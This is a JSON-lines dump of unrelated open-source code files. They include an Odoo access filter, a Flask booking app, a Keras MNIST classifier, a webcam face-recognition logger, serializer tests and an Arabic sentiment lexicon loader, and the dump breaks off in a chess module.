domain.append(['user_id','in',house_user_ids])\n res = super(sale_order, self).search_read(cr, uid, domain=domain, offset=offset, limit=limit, order=order, context=context)\n return res\n\n def read_group(self, cr, uid, domain, fields, groupby, offset=0, limit=None, context=None, orderby=False,lazy=True):\n if self.pool['res.users'].has_group(cr, uid, 'base.group_sale_salesman_all_leads_special'):\n #Find House User\n house_user_ids = self.pool.get('res.users').search(cr, uid, [('name','ilike','GIW House Account')], context=context)\n house_user_ids.append(uid)\n domain.append(['user_id','in',house_user_ids])\n return super(sale_order, self).read_group(cr, uid, domain, fields, groupby, offset, limit, context, orderby,lazy)\n","sub_path":"ursa_house_account_access/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"144050282","text":"#!/usr/bin/env python\nimport _init_paths\nfrom load_probs_and_calc_stats import load_probs_and_calc_stats\nimport os.path as osp\n\n\nif __name__ == '__main__':\n\n probs_len = 10572\n max_orig_label = 10244\n\n\n # image path: osp.join(image_dir, )\n prob_dir = r'/home/asian_probs_on_sphere64_webface/corr_prob'\n image_list_file = r'/disk2/zhaoyafei/face-recog-train/train-val-lists/asian/face_asian_train_list_noval_10245-ids_540735-objs_170818-225846-norootdir.txt'\n\n # save_dir = None\n save_dir = '../../prob-results/asian_probs_on_sphere64_webface/corr_prob_stats'\n\n num_images = -1 # <0, means all images\n\n load_probs_and_calc_stats(prob_dir, probs_len,\n max_orig_label,\n image_list_file, num_images,\n save_dir)","sub_path":"scripts/load_probs_and_calc_stats/test_scripts_corr_prob/test_asian_probs_on_sphere64_webface.py","file_name":"test_asian_probs_on_sphere64_webface.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"75901602","text":"from django.forms import ModelForm\r\nfrom django import forms\r\nfrom django.core.validators import MinLengthValidator\r\n\r\nfrom .models import Item\r\n\r\nclass ItemCreateForm(ModelForm):\r\n \r\n class Meta:\r\n model = Item\r\n fields = (\"item\",)\r\n\r\n item = forms.CharField(\r\n label = \"Name\",\r\n max_length=30, \r\n validators=[MinLengthValidator(3)],\r\n error_messages={\r\n 'min_length': (\"Name must be longer than 2 characters\")}\r\n )\r\n \r\n\r\n def save(self, commit=True):\r\n item = super(ItemCreateForm, self).save(commit=False)\r\n\r\n if commit:\r\n item.save()\r\n return item\r\n","sub_path":"apps/main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"265408991","text":"from flask import Flask, render_template, request, redirect, flash\nimport csv\nimport time\n\napp = Flask(__name__)\napp.secret_key = 'some_secret'\n\n@app.route('/')\ndef home():\n aboutUs = readFile(\"static/aboutUs.txt\")\n onSite = readCSV(\"static/onsite.csv\")\n offSite = readCSV(\"static/offsite.csv\")\n comments = readCSV(\"static/comments.csv\")\n allBookings = readCSV(\"static/bookings.csv\")\n bookingDates = readAllDatesBooked(allBookings)\n return render_template('home.html', aboutUsText=aboutUs, onSiteList=onSite, offSiteList=offSite,\n commentsList=comments, bookings=bookingDates)\n\n\ndef readFile(fileName):\n with open(fileName) as fileContent:\n return fileContent.readlines()\n\n\ndef readCSV(fileName):\n with open(fileName, 'r') as inFile:\n reader = csv.reader(inFile)\n theList = [row for row in reader]\n return theList\n\n\ndef addToCSV(item1, item2, item3, fileName):\n fileContents = readCSV(fileName)\n fileContents.append([item1, item2, item3])\n with open(fileName, 'w') as outFile:\n writer = csv.writer(outFile)\n writer.writerows(fileContents)\n return\n\ndef readAllDatesBooked(bookings):\n return bookings\n\n@app.route('/addReview', methods=['POST'])\ndef addReview():\n name = request.form['fullName']\n comment = request.form['comment']\n date = time.strftime(\"%x\")\n print(name)\n print(comment)\n print(date)\n addToCSV(name, date, comment, \"static/comments.csv\")\n return redirect('/')\n\n\n@app.route('/makeBooking', methods=['POST'])\ndef makeBooking():\n name = request.form['name']\n date = request.form['date']\n email = request.form['email']\n if name == \"\":\n flash(\"Please enter details to submit a booking request\")\n return redirect('/')\n if checkBookings(date) == 1:\n addToCSV(name, date, email, \"static/bookings.csv\")\n flash(\"Booking for \" + date + \" has been successfully made\")\n else:\n flash(\"Villa is not available on this date, please try again\")\n return redirect('/')\n\n\ndef checkBookings(date):\n bookings = readCSV(\"static/bookings.csv\")\n for booking in bookings:\n if booking[1] == date:\n return 0\n return 1\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"599650972","text":"\ndef hex4(value):\n value = hex(value).upper()[2:]\n value = value.rjust(4,'0')\n return value\n\ndef hex2(value):\n value = hex(value).upper()[2:]\n value = value.rjust(2,'0')\n return value\n\ndef dump_bytes(b):\n ret = ''\n b = list(b) \n for i in b:\n ret+=hex2(i)+' ' \n return ret.strip()\n\ndef hexlist(b):\n ret = '['\n for i in b:\n ret+=hex2(i)+', '\n ret = ret[0:-2] + ']'\n return ret\n\ndef indent_code(s,level):\n # code goes out to column 65\n if s[4]!= ':':\n return s\n \n i = s.find(';')\n \n if i>=0: \n comment = s[i+1:].strip()\n code = s[6:i].strip()\n return s[0:6]+code.rjust(len(code)+level*2).ljust(65)+'; '+comment.rjust(len(comment)+level*2)\n else:\n code = s[6:].strip()\n return s[0:6]+code.rjust(len(code)+level*2)\n","sub_path":"computerarcheology/util/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"372991711","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport autoslug.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('news', '0012_auto_20151111_0959'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='news',\n name='slug',\n field=autoslug.fields.AutoSlugField(editable=False, unique_with=(b'pub_date',), populate_from=b'title', max_length=40, verbose_name=b'Slug'),\n ),\n ]\n","sub_path":"news/migrations/0013_auto_20151111_1001.py","file_name":"0013_auto_20151111_1001.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"48118365","text":"def numpy2hJ(h,J):\n hout = [i for i in h]\n Jout={}\n (row,col)=J.shape\n for i in range(row):\n for j in range(col):\n if J[i,j]!=0:\n Jout.update({(i,j):float(J[i,j])})\n return hout,Jout\n\ndef adj2sapi(adjMat):\n\t(row,col) = adjMat.shape\n\tJ = []\n\tfor i in range(row):\n\t\tfor j in range(col):\n\t\t\tif adjMat[i,j]!=0:\n\t\t\t\tJ.append((i,j))\n\treturn J\n","sub_path":"src/ri_help.py","file_name":"ri_help.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"416004894","text":"import numpy as np\nimport keras\nfrom keras import layers, optimizers, losses, metrics\nfrom keras.models import Model, Sequential\nfrom keras.datasets import mnist\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nimport struct\nfrom array import array\nfrom os.path import join\nimport random\nimport tensorflow as tf\nimport pandas as pd\nimport os\nfrom keras.callbacks import ModelCheckpoint\nfrom keras import regularizers\nfrom keras import backend as K\nfrom keras.utils import to_categorical\nfrom tensorflow.keras.models import load_model\nimport sys\nfrom sklearn.metrics import classification_report\nfrom classification_functions import MnistDataloader, print_plot, print_correct_incorrect\n\n\nif __name__ == \"__main__\":\n\tif (len(sys.argv) == 11):\n\t\ti = 0\n\t\tfor var in sys.argv:\t\t\t\t\t\t\t\t\t\t# get values from command line\n\t\t\tif (var == \"-d\"):\n\t\t\t\ttraining_images_filepath = sys.argv[i + 1]\n\t\t\tif (var == \"-dl\"):\n\t\t\t\ttraining_labels_filepath = sys.argv[i + 1]\n\t\t\tif (var == \"-t\"):\n\t\t\t\ttest_images_filepath = sys.argv[i + 1]\n\t\t\tif (var == \"-tl\"):\n\t\t\t\ttest_labels_filepath = sys.argv[i + 1]\n\t\t\tif (var == \"-model\"):\n\t\t\t\tmodel = sys.argv[i + 1]\n\t\t\ti = i + 1\n\telse:\n\t\tprint(\"Wrong input. Using default values.\")\n\t\ttraining_images_filepath = 'train-images-idx3-ubyte' \t\t# default values if not given by user\n\t\ttraining_labels_filepath = 'train-labels-idx1-ubyte'\n\t\ttest_images_filepath = 't10k-images-idx3-ubyte'\n\t\ttest_labels_filepath = 't10k-labels-idx1-ubyte'\n\t\tmodel = 'autoencoder.h5'\n\n\t(xtrain, ytrain) = MnistDataloader(training_images_filepath, training_labels_filepath)\t# read datasets\n\t(xtest, ytest) = MnistDataloader(test_images_filepath, test_labels_filepath)\n\n\tx_train = np.array(xtrain)\n\tx_test = np.array(xtest)\n\ty_train = np.array(ytrain)\n\ty_test = np.array(ytest)\n\n\tx_train = x_train.astype('float32') / 255.\t\t\t\t\t\t# values 0/1\n\tx_test = x_test.astype('float32') / 255.\n\n\tx_train = np.reshape(x_train, (len(x_train), 28, 28, 1))\n\tx_test = np.reshape(x_test, (len(x_test), 28, 28, 1))\n\n\ty_train_array = to_categorical(y_train)\t\t\t\t\t\t\t# fix hot\n\ty_test_array = to_categorical(y_test)\n\n\tx_train, xx_test, y_train_array, xy_test_array = train_test_split(x_train, y_train_array, test_size=0.2, random_state=13)\t#split dataset\n\n\tlist_loss = []\n\tlist_val_loss = []\n\tlist_accuracy = []\n\tlist_val_accuracy = []\n\n\tlist_epochs_num = []\n\tlist_batch_sz = []\n\tlist_neurons_fc = []\n\n\twhile (1):\n\t\tnum_classes = 10\n\n\t\tepochs_num = int(input(\"GIVE NUMBER OF EPOCHS: \\n\"))\t\t\t\t\t\t# get values from user\n\t\tbatch_sz = int(input(\"GIVE BATCH SIZE: \\n\"))\n\t\tneurons_fc = int(input(\"GIVE NEURONS AT FC LAYER: \\n\"))\n\n\t\t# epochs_num = 5\n\t\t# batch_sz = 100\n\t\t# neurons_fc = 256\n\n\t\tlist_epochs_num.append(epochs_num)\n\t\tlist_batch_sz.append(batch_sz)\n\t\tlist_neurons_fc.append(neurons_fc)\n\n\t\tnetworkInput = keras.layers.Input(shape=(28, 28, 1), name='input')\n\n\t\tautoencoder_model = load_model(model)\t\t\t\t\t\t\t\t\t\t# load autoencoder model\n\t\tl = (len(autoencoder_model.layers)/2) -1\n\n\t\tflat = keras.layers.Flatten()(autoencoder_model.layers[int(l)].output) # get autoencoder's output and do flatten\n\t\tden = keras.layers.Dense(neurons_fc, activation='relu')(flat)\n\t\toutput = keras.layers.Dense(num_classes, activation='softmax')(den)\n\n\t\tencoder_model = Model(inputs=autoencoder_model.layers[0].output, outputs=output, name='ENCODER')\n\n\t\tprint(\"\\nStage 1:\\n\")\t\t\t\t\t\t\t\t\t\t\t\t\t\t# stage 1: only fully connected layer\n\t\tfor layer in encoder_model.layers[0:int(l)+1]:\n\t\t\tlayer.trainable = False\n\n\t\tencoder_model.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adam(), metrics=['accuracy'])\n\t\tencoder_model.summary()\n\n\t\tclassify_train = encoder_model.fit(x_train, y_train_array, batch_size=batch_sz, epochs=epochs_num, verbose=1, validation_data=(xx_test, xy_test_array))\n\n\t\tprint(\"\\nStage 2:\\n\")\t\t\t\t\t\t\t\t\t\t\t\t\t\t# stage 2: all layers\n\t\tfor layer in encoder_model.layers[0:int(l)+1]:\n\t\t\tlayer.trainable = True\n\n\t\tencoder_model.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adam(), metrics=['accuracy'])\n\t\t\n\t\tclassify_train = encoder_model.fit(x_train, y_train_array, batch_size=batch_sz, epochs=epochs_num, verbose=1, validation_data=(xx_test, xy_test_array))\n\n\t\tlast_loss = classify_train.history['loss'][-1]\t\t\t\t\t\t\t\t# get last value to use for plots\n\t\tlast_val_loss = classify_train.history['val_loss'][-1]\n\t\tlast_accuracy = classify_train.history['accuracy'][-1]\n\t\tlast_val_accuracy = classify_train.history['val_accuracy'][-1]\n\n\t\tlist_loss.append(last_loss)\n\t\tlist_val_loss.append(last_val_loss)\n\t\tlist_accuracy.append(last_accuracy)\n\t\tlist_val_accuracy.append(last_val_accuracy)\n\n\t\txtrain = np.array(xtrain)\n\t\tytrain = np.array(ytrain)\n\t\t\n\t\txtrain = xtrain.astype('float32') / 255.\t\t\t\t\t\t# values 0/1\n\t\txtrain = np.reshape(xtrain, (len(xtrain), 28, 28, 1))\n\n\t\tval = int(input(\"TO REPEAT THE EXPERIMENT PRESS 1.\\nTO SHOW THE PLOTS PRESS 2.\\nTO CLASSIFY IMAGES PRESS 3.\\n\"))\n\t\tif (val == 1):\n\t\t\tcontinue\n\n\t\telif (val == 2):\n\t\t\tval = int(input(\"TO PRINT EPOCHS PLOT PRESS 0.\\nTO PRINT BATCH_SIZE PLOT PRESS 1.\\nTO PRINT NEURONS_FC PLOT PRESS 2.\\n\"))\n\t\t\tprint_plot(int(val), list_loss, list_val_loss, list_accuracy, list_val_accuracy, list_epochs_num, list_batch_sz, list_neurons_fc)\t# print plots\n\n\t\t\ty_pred = encoder_model.predict(x_test, batch_size=batch_sz, verbose=1)\n\t\t\ty_pred_bool = np.argmax(y_pred, axis=1)\n\t\t\tprint(classification_report(y_test, y_pred_bool))\t\t\t\t\t\t\t\t\t\t# print report\n\n\t\t\tval = int(input(\"TO REPEAT THE EXPERIMENT PRESS 1.\\nTO CLASSIFY IMAGES PRESS 3.\\n\"))\n\t\t\tif (val == 1):\n\t\t\t\tcontinue\n\t\t\telif (val == 3):\n\t\t\t\tpredicted_classes = encoder_model.predict(xtrain)\n\t\t\t\tpredicted_classes = np.argmax(np.round(predicted_classes), axis=1)\n\n\t\t\t\tprint_correct_incorrect(predicted_classes, xtrain, ytrain)\t\t\t\t\t\t\t# print correct and incorrect images\n\n\t\t\t\tclusters = [[] for i in range(10)]\n\t\t\t\tfor i in range(len(xtrain)):\n\t\t\t\t\tclusters[predicted_classes[i]].append(i)\n\n\t\t\t\tf = open(\"classification_results\", \"w\")\n\t\t\t\tfor i in range(len(clusters)):\n\t\t\t\t\tf.write(\"CLUSTER-\" + str(i) + \" { size: \" + str(len(clusters[i])))\n\t\t\t\t\tfor im in clusters[i]:\n\t\t\t\t\t\tf.write(\", \" + str(im))\n\t\t\t\t\tf.write(\"\\n\")\n\t\t\t\tf.close()\n\t\t\t\t\n\t\t\t\tbreak\n\n\t\telif (val == 3):\n\t\t\tpredicted_classes = encoder_model.predict(xtrain)\n\t\t\tpredicted_classes = np.argmax(np.round(predicted_classes), axis=1)\t\n\n\t\t\tprint_correct_incorrect(predicted_classes, xtrain, ytrain)\t\t\t\t\t\t\t\t# print correct and incorrect images\n\n\t\t\tclusters = [[] for i in range(10)]\n\t\t\tfor i in range(len(xtrain)):\n\t\t\t\tclusters[predicted_classes[i]].append(i)\n\n\t\t\tf = open(\"classification_results\", \"w\")\n\t\t\tfor i in range(len(clusters)):\n\t\t\t\tf.write(\"CLUSTER-\" + str(i) + \" ( size: \" + str(len(clusters[i])))\n\t\t\t\tfor im in clusters[i]:\n\t\t\t\t\tf.write(\", \" + str(im))\n\t\t\t\tf.write(\")\\n\")\n\t\t\tf.close()\n\n\t\t\tbreak\n\n\n\n\n\n","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":6814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"587107736","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 25 18:53:52 2020\r\n\r\n@author: MOHANA D\r\n\"\"\"\r\n\r\n#Write a program that calculates and prints the value according to the given formula:\r\n#Q = Square root of [(2 * C * D)/H] Following are the fixed values of C and H: C is 50. \r\n#H is 30. D is the variable whose values should be input to your program in a comma-separated sequence.\r\n\r\n\r\nimport math\r\n\r\nnumbers = input(\"Provide D: \")\r\nnumbers = numbers.split(',')\r\n\r\nresult_list = []\r\nfor D in numbers:\r\n Q = round(math.sqrt(2 * 50 * int(D) / 30))\r\n result_list.append(Q)\r\n\r\nprint(result_list)\r\n\r\n","sub_path":"dch.py","file_name":"dch.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"642300913","text":"import unittest\nfrom os import path, curdir\n\nfrom serializer.serializers.json_serializer import JsonSerializer\nfrom .test_data import data, get_answer_files, get_test_files\n\n\nclass JsonSerializerTestCase(unittest.TestCase):\n def setUp(self):\n self.test_json_ser = JsonSerializer()\n self.path_dir = path.join(\n path.abspath(curdir),\n 'test_serializers',\n 'test_answers',\n 'test_json'\n )\n self.data = data\n self.answer_files = get_answer_files('json')\n self.json_files = get_test_files('json')\n\n def test_dump(self):\n for value, test_json, answer_file in zip( \n self.data[:-4],\n self.json_files[:-4], \n self.answer_files[:-4]):\n self.test_json_ser.dump(\n value, path.join(self.path_dir, test_json))\n with open(path.join(\n self.path_dir, test_json), 'r') as rf:\n result = rf.read()\n with open(path.join(\n self.path_dir, answer_file), 'r') as rf:\n answer = rf.read()\n self.assertEqual(result, answer)\n self.assertIsNone(\n self.test_json_ser.dump(None, self.data[:-1])\n )\n\n def test_dumps(self):\n for value, answer_file in zip(self.data[:-4],\n self.answer_files[:-4]):\n with open(path.join(\n self.path_dir, answer_file), 'r') as rf:\n answer = rf.read()\n self.assertEqual(\n self.test_json_ser.dumps(value), answer\n )\n self.assertIsNone(\n self.test_json_ser.dump(self.data[:-1], self.data[:-1])\n )\n\n def test_load(self):\n for value, test_json in zip(self.data[:-4],\n self.json_files[:-4]):\n self.assertEqual(\n self.test_json_ser.load(path.join(\n self.path_dir, test_json)), value\n )\n func = self.test_json_ser.load(path.join(\n self.path_dir, self.json_files[4]),\n convert=True)\n self.assertEqual(type(func), dict)\n simple_class = self.test_json_ser.load(path.join(\n self.path_dir, self.json_files[5]))\n self.assertEqual(type(simple_class), type)\n complex_class = self.test_json_ser.load(path.join(\n self.path_dir, self.json_files[6]))\n self.assertTrue(hasattr(complex_class, 'func_in_class'))\n complex_object = self.test_json_ser.load(path.join(\n self.path_dir, self.json_files[7]))\n self.assertEqual(complex_object.other.string, 'string')\n self.assertIsNone(self.test_json_ser.load('incorrect_path'))\n\n def test_loads(self):\n for value, answer_file in zip(self.data[:-4],\n self.answer_files[:-4]):\n with open(path.join(\n self.path_dir,\n answer_file), 'r') as rf:\n data_ = rf.read()\n self.assertEqual(\n self.test_json_ser.loads(data_), value\n )\n\n def get_data():\n for data_file in self.answer_files[4:]:\n with open(path.join(\n self.path_dir,\n data_file), 'r') as rf:\n data_ = rf.read()\n yield data_\n\n data_ = get_data()\n func = self.test_json_ser.loads(next(data_))\n self.assertEqual(func(12), 101)\n simple_class = self.test_json_ser.loads(next(data_))\n self.assertEqual(type(simple_class), type)\n complex_class = self.test_json_ser.loads(next(data_))\n self.assertTrue(hasattr(complex_class, 'func_in_class'))\n complex_object = self.test_json_ser.loads(next(data_))\n self.assertEqual(complex_object.other.string, 'string')\n self.assertIsNone(self.test_json_ser.loads('bad_data'))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"lab2/serializer/tests/test_serializers/test_json_serializer.py","file_name":"test_json_serializer.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"245379270","text":"\nimport cv2\nfrom bootstrap import *\n\nimport logging as log\nimport datetime as dt\nfrom time import sleep\nfrom save_logs import *\nfrom image_recognition import *\nfrom db_management import *\nfrom camera_security import *\n\n\nanterior = 0\ncnt=0\n\nfaceCascade = cv2.CascadeClassifier(cascPath)\nbodyCascade = cv2.CascadeClassifier(cascPath_full_body)\n\n\n# TODO -> need to check in order to define overriding the images saved\n\ndef check_file_size(path):\n\n path = os.path.abspath(path)\n\n size = 0\n for e in os.scandir(path):\n if e.is_file():\n size += e.stat().st_size\n\n return size\n\n\ndef saveFaceImage(frame, x, y, w, h):\n sub_face = frame[y:y + h, x:x + w]\n FaceFileName = save_temp_images_path+'temp/'+\"face_\" + str(cnt) + \".jpg\"\n cv2.imwrite(FaceFileName, sub_face)\n return FaceFileName\n\n\n'''\n same the frame to the tmepFullImages\n'''\ndef saveWholeImage(frame):\n global cnt\n\n image_name = save_temp_images_path +'tmepFullImages/'+\"face_\" + str(cnt) + \".jpg\"\n\n cv2.imwrite(image_name, frame)\n cnt+=1\n\n return image_name\n\n\ndef checkForSimilarities(image_name):\n\n res = compare_TO_others_in_folder(image_name)\n\n if res is None:\n print('No face was detected')\n # send_image_to_main_server(image_name)\n send_image_to_main_server(image_name)\n\n os.remove(image_name)\n os.remove(tmpPath+image_name.split('/')[-1])\n return None\n if not res:\n return False\n\n else:\n # check for sql the name of the student with that image Name\n\n try:\n student_name = get_the_name_for_found_image_name(res)\n except Exception:\n print(\"Not found in the database\")\n save_messaes_to_logs('The student could ')\n # sendToServer({'data':\"An unregistered person entered the dromitory entrance\"})\n send_image_to_main_server(image_name)\n\n return False\n\n if len(student_name)==0:\n print('The student image was not found in the database')\n\n # sendToServer({'data':\"An unregistered person entered the dromitory entrance\"})\n send_image_to_main_server(image_name)\n\n else:\n\n print(\"The student name is : \"+student_name)\n\n # sendToServer({'data':\"An unregistered person entered the dormitory entrance\"})\n # send_image_to_main_server(image_name)\n\n return student_name\n\n\n\ndef processImages(faces,frame):\n global anterior\n\n # Draw a rectangle around the faces\n for (x, y, w, h) in faces:\n\n # save the images if the faces were found\n # saveFaceImage(frame, x, y, w, h)\n\n # check the width and the height of the rectangle to define, how close the face is\n if w >70 and h >70:\n # saveFaceImage(frame, x, y, w, h)\n cv2.rectangle(frame, (x - 10, y - 60), (x + w + 10, y + h + 20), (red, green, blue), border_size)\n # saveWholeImage(frame)\n img_name = saveFaceImage(frame,x,y,w,h)\n font = cv2.FONT_HERSHEY_SIMPLEX\n\n # write the student name -> returned from the image processing\n res = checkForSimilarities(saveWholeImage(frame))\n\n if res is None:\n continue\n\n if not res:\n # cv2.putText(frame,'Not Part of the Dorm',(x,y-5), font, 1, (200, 0,0), 1)\n save_log('Not a member',str(datetime.datetime.now()))\n\n # move the full image to the not Members Folder\n os.rename(tmpFullImages_path+img_name.split('/')[-1],not_members+img_name.split('/')[-1])\n\n\n\n else:\n # cv2.putText(frame, res, (x, y - 5), font, 1, (200, 0, 0), 1)\n save_log(res, str(datetime.datetime.now()))\n os.remove(img_name) # remove the image which exists as a member\n\n os.remove(tmpFullImages_path + img_name.split('/')[-1])\n\n\n if anterior != len(faces):\n anterior = len(faces)\n log.info(\"faces: \" + str(len(faces)) + \" at \" + str(dt.datetime.now()))\n\n\n\ndef start_imaging():\n\n save_start_end_log('', None)\n\n\n # configure the log\n # for every date a new log is going to be shown\n # log.basicConfig(filename='webcam.log', level=log.INFO)\n video_capture = cv2.VideoCapture(0)\n\n\n # using a stream video\n # video_capture.open(\"http://169.254.197.26/\")\n\n while True:\n\n if not video_capture.isOpened():\n print('Unable to load camera.')\n\n sleep(5)\n save_messaes_to_logs('Unable to load camera.')\n break\n\n # Capture frame-by-frame\n ret, frame = video_capture.read()\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.2,\n minNeighbors=5,\n minSize=(40, 40),\n flags=cv2.CASCADE_SCALE_IMAGE\n )\n\n\n # # upper_body\n # eye = bodyCascade.detectMultiScale(\n # gray,\n # scaleFactor=1.2,\n # minNeighbors=5,\n # minSize=(40, 40)\n # )\n\n isBlur = cv2.Laplacian(frame, cv2.CV_64F).var()\n\n # print()\n\n if isBlur >= 70 and len(faces)>0 :\n print('Checking')\n processImages(faces, frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n save_start_end_log(None, '')\n video_capture.release()\n cv2.destroyAllWindows()\n exit(1)\n\n # Display the resulting frame\n cv2.imshow('Video', frame)\n\n # When everything is done, release the capture\n video_capture.release()\n cv2.destroyAllWindows()\n\n save_start_end_log(None,'')\n\n\n\n\n\n","sub_path":"src/read_from_camera.py","file_name":"read_from_camera.py","file_ext":"py","file_size_in_byte":5685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"25091679","text":"\nimport texttable as tt\nfrom math import sqrt\n\n\n__author__ = 'javier'\n\n\ndef report(results):\n tab = tt.Texttable()\n tab.header(['Benchmark', 'Input', 'Average', 'std dev %', 'std dev', 'runs', 'discarded'])\n\n tab.set_cols_align(['r','r', 'r','r', 'r', 'r', 'r'])\n tab.set_deco(tab.HEADER | tab.VLINES)\n\n for benchmark, measures in sorted(results.items()):\n reportBenchmark(tab, benchmark, measures)\n\n table = tab.draw()\n print (table)\n\ndef reportBenchmark(tab, benchmark, measures):\n\n trimmed = trim_ends(sorted(measures), 0.1)\n runs = len(trimmed)\n average = sum(trimmed) / runs\n stddev = sqrt(sum([(measure - average)**2 for measure in trimmed]))\n stddev_relative = stddev / average * 100\n tab.add_row([benchmark.version, benchmark.value, average, \"%2.2f %%\" % stddev_relative, stddev, len(measures), len(measures) - runs])\n\n tab.set_cols_width([35, 10, 10, 10, 10, 10, 10])\n\ndef trim_ends(sorted_list, proportion_to_cut):\n\n size = len(sorted_list)\n left = int(proportion_to_cut * size)\n right = size - left\n\n return sorted_list[left:right]\n","sub_path":"BenchmarkReporter.py","file_name":"BenchmarkReporter.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"539941524","text":"# -*- coding: utf-8 -*-\nimport codecs\nimport re\nfrom collections import Counter\n\nlexicon = '/usr/local/data/arabsenti_lexicon.txt'\n\n# sentiment: # 0=NEUT # 1=POS # 2=NEG\ntranslator = {'0': 0, '2': -1, '1': 1}\n\nlex = {}\nwith codecs.open(lexicon, encoding='utf-8', mode='r') as txt_fp:\n for line in txt_fp:\n arabic_dia, freq, sentiment, buck_dia, buck, arabic_no_ham, arabic_ham = map(unicode.strip, line.split(u'\\t'))\n if sentiment:\n # if arabic_dia in lex:\n # and lex[arabic_ham] != translator[sentiment]\n # print 'Already stored!', arabic_dia, lex[arabic_dia], 'new', translator[sentiment]\n lex[arabic_dia] = translator[sentiment]\n lex[arabic_ham] = translator[sentiment]\n lex[arabic_no_ham] = translator[sentiment]\n\n\ndef tokens(token_list):\n sentiments = Counter(lex.get(token) for token in token_list)\n return dict(pos=sentiments.get(1, 0), neg=sentiments.get(-1, 0), zero=sentiments.get(0, 0))\n\n\nwhitespace = re.compile(r'\\s+')\ndef document(text):\n return tokens(whitespace.split(text))\n\n# def write_js(stream):\n# lex_json = json.dumps(lex, ensure_ascii=False, indent=2, sort_keys=True)\n# stream.write(u'var arabsenti_lexicon = %s;\\n' % lex_json)\n# stream.write(u'''\n# function arabsenti(text) {\n# var tokens = text.split(/\\s+/);\n\n# var sum = 0, abs_sum = 0, count = 0;\n# tokens.forEach(function(token) {\n# var sentiment = arabsenti_lexicon[token];\n# if (sentiment !== undefined) {\n# sum += sentiment;\n# abs_sum += Math.abs(sentiment);\n# count++;\n# }\n# });\n# return {sum: sum, abs_sum: abs_sum, count: count, mean: parseFloat(sum) / count, };\n# }\n# ''')\n\n# if __name__ == '__main__':\n # write_js(sys.stdout)\n # with codecs.open(js, encoding='utf-8', mode='w') as js_fp:\n # write_js(js_fp)\n\n# var sum = function(vector) {\n# var accumulator = 0; vector.forEach(function (num) { accumulator += num; }); return accumulator; };\n# var abs_sum = function(vector) {\n# var accumulator = 0; vector.forEach(function (num) { accumulator += Math.abs(num); }); return accumulator; };\n","sub_path":"lexicons/arabsenti.py","file_name":"arabsenti.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"315737367","text":"import sys, os\nimport time\nfrom common import date_nid\nfrom common import settings\n\nwhile 1:\n nid = date_nid.nid_now()\n date = date_nid.nid_to_date(nid)\n logfile = '/data/ztf/logs/ztf_' + date + '_tns.log'\n\n py = settings.LASAIR_ROOT + 'anaconda3/envs/sherlock/bin/python '\n cmd = 'date >> %s;' % logfile\n cmd += py + settings.LASAIR_ROOT + 'lasair/src/post_ingest/poll_tns.py --pageSize=%d --inLastNumberOfDays=%d >> %s;' \n cmd = cmd % (settings.TNSpageSize, settings.TNSinLastNumberOfDays, logfile)\n cmd += py + settings.LASAIR_ROOT + 'lasair/src/alert_stream_ztf/common/run_tns_crossmatch.py >> %s' % logfile\n os.system(cmd)\n time.sleep(settings.TNSsleepTime)\n","sub_path":"src/alert_stream_ztf/tns_log.py","file_name":"tns_log.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"618790791","text":"from tile import *\nfrom move import *\n\n#asciiart from:\n#http://www.retrojunkie.com/asciiart/sports/chess.htm\n\nclass Figure:\n figure_id = 0\n abreviation = ''\n\n black_ascii = ['.......',\n '.......',\n '.......',\n '.......']\n white_ascii = black_ascii\n\n def __init__(self, start_position, color, board=None):\n self.position = Tile.from_tuple(start_position)\n self.color = color.lower() == 'w'\n if board:\n self.board = board\n self.board.put_figure(self)\n\n @classmethod\n def get_figure_types(cls):\n return [NoFigure, Pawn, Rook, Knight, Queen, King, Bishop]\n\n @classmethod\n def from_number(cls, number, start_position):\n 